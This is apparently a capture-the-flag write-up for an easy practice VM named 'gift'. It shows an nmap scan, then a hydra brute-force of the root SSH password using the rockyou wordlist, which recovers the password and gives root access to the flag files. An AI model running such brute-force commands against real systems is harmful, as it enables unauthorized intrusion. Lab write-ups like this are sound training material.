ℹ️ This VM is VERY easy to pwn. I wrote this report out of a chronicler’s duty.

Enumeration and priv esc#

I’ve started with the standard path of enumerating services.

$ nmap -sT target.local

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

I had direct access to the http service running the basic placeholder website and ssh that probably will be useful pretty soon.

The placeholder said:

<body>
  Dont Overthink. Really, Its simple.
  <!-- Trust me -->
</body>

We’ll see about that 😉

From the 404 page I learned it’s served by nginx.

Given the webpage said explicitly not to overthink the process (and the fact that gobuster found nothing), I thought of bruteforcing the root password using hydra 🤷‍♂

$ hydra -l root -P /usr/share/wordlists/rockyou.txt.gz ssh://target.local

# ...
[22][ssh] host: target.local   login: root   password: simple

Guess it really was that simple.

Pwned#

$ ssh root@target.local
root@target.local\'s password:

IM AN SSH SERVER
gift:~\# ls

root.txt  user.txt

gift:~\# cat root.txt user.txt
# redacted

Pwned.